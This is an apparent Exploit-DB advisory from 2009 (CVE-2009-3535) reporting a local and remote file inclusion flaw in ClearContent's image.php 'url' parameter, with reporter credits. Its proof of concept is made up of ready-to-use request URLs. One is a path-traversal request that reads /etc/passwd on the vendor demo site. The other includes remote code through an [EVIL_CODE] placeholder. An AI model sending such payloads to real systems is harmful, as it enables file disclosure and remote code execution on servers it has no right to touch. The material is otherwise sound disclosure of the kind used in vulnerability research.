ClearContent image.php url RFI/LFI Vulnerability

2009-07-09T00:00:00
ID EDB-ID:9089
Type exploitdb
Reporter MizoZ
Modified 2009-07-09T00:00:00

Description

ClearContent (image.php url) RFI/LFI Vulnerability. CVE-2009-3535. Webapps exploit for php platform

                                        
                                            ----------------------------------------------------------------------------------------------------

  Name : ClearContent
  Site : http://www.allisclear.com/

  Demo : http://demo.allisclear.com/

----------------------------------------------------------------------------------------------------

 
  Found By : MizoZ [EvilWay Team]

  Made in  : Morocco
  Contact  : mizozx[at]gmail[dot]com
  Greetz   : Moudi , Zuka , All friends


----------------------------------------------------------------------------------------------------


  P0c:
 
    LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
    RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???


 RFI needs register_globals=on;

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-09]